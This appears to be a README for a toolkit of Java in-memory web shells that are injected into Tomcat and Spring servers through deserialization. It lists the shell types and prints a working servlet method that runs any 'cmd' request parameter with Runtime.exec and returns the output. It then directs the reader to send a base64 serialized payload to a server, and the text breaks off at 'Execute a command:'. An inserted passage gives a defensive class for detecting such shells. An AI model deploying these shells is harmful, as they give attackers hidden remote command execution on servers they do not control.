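Notes summarizing the types of Java memory shells, with code examples for each.
JavaMemShell
Example memory shells implemented by having the TemplatesImpl class load bytecode during Java deserialization.
Server-Demo
A server-side demo on Spring 5.2.3 and Tomcat 8 that accepts a parameter and deserializes it.
tomcat
- Filter type
- Servlet type
- Listener type
- TomcatValue type
spring
- Controller type
- Interceptor type
javaagent
- Written to disk, persistent
The dynamic-registration logic for each shell type lives in a static initializer block. Because the class is loaded through deserialization, the implementing class must extend AbstractTranslet.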
    static {
        try {
            // xxx
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
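The logic that obtains the request and response, executes the command, and echoes the output lives in methods such as doFilter, requestDestroyed, and service; replace it as needed. Example: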
    public void service(ServletRequest servletRequest, ServletResponse servletResponse)
            throws ServletException, IOException {
        HttpServletRequest request = (HttpServletRequest) servletRequest;
        HttpServletResponse response = (HttpServletResponse) servletResponse;
        String method = request.getMethod();
        if ("GET".equals(method)) {
            String cmd = request.getParameter("cmd");
            if (cmd != null) {
                Process process = Runtime.getRuntime().exec(cmd);
                Scanner s = new Scanner(process.getInputStream()).useDelimiter("\\a");
                String output = s.hasNext() ? s.next() : "";
                PrintWriter writer = response.getWriter();
                writer.write(output);
                writer.flush();
                writer.close();
            }
        }
    }
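From the defender's side, the requirement stated above (every implementing class extends AbstractTranslet) is a usable detection trait: a Filter, Servlet, Listener, Valve, or Interceptor that descends from an XSLT translet has no legitimate reason to exist. The following audit helper is an added example, not code from this repository; the class name `TransletComponentAudit`, its methods, and the mapping of the shell types to the interface names in `COMPONENT_TYPES` are assumptions made for illustration.

```java
import java.security.CodeSource;
import java.util.*;

// Added defensive example (hypothetical helper, not part of JavaMemShell).
public class TransletComponentAudit {
    // Superclass the README says every implementing class must extend.
    static final String TRANSLET =
        "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
    // Interfaces for the shell types listed above (assumed mapping), matched by
    // name so the audit compiles without servlet or Spring jars on the classpath.
    static final Set<String> COMPONENT_TYPES = new HashSet<>(Arrays.asList(
        "javax.servlet.Filter", "javax.servlet.Servlet",
        "javax.servlet.ServletRequestListener", "org.apache.catalina.Valve",
        "org.springframework.web.servlet.HandlerInterceptor"));

    static boolean extendsTranslet(Class<?> c) {
        for (Class<?> k = c.getSuperclass(); k != null; k = k.getSuperclass())
            if (TRANSLET.equals(k.getName())) return true;
        return false;
    }

    // True if the interface, or any interface it extends, is a listed type.
    static boolean isListed(Class<?> i) {
        if (COMPONENT_TYPES.contains(i.getName())) return true;
        for (Class<?> p : i.getInterfaces()) if (isListed(p)) return true;
        return false;
    }

    static boolean isWebComponent(Class<?> c) {
        for (Class<?> k = c; k != null; k = k.getSuperclass())
            for (Class<?> i : k.getInterfaces())
                if (isListed(i)) return true;
        return false;
    }

    // Classes defined from raw bytes carry no code source location on disk.
    static boolean hasNoBackingFile(Class<?> c) {
        CodeSource cs = c.getProtectionDomain().getCodeSource();
        return cs == null || cs.getLocation() == null;
    }

    // Primary signal: a web component that is also a translet subclass.
    static boolean suspicious(Class<?> c) {
        return extendsTranslet(c) && isWebComponent(c);
    }

    public static void main(String[] args) {
        // Stand-alone run; in a server, feed Instrumentation.getAllLoadedClasses().
        for (Class<?> c : new Class<?>[]{TransletComponentAudit.class, String.class})
            System.out.println(c.getName() + " suspicious=" + suspicious(c)
                + " noBackingFile=" + hasNoBackingFile(c));
    }
}
```

`hasNoBackingFile` is only a supporting signal, since JDK bootstrap classes also report no code source; treat it as corroboration for classes that `suspicious` already flags.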
Taking the springInterceptor memory shell code as an example, send the generated serialized base64 payload to the server.
Execute a command: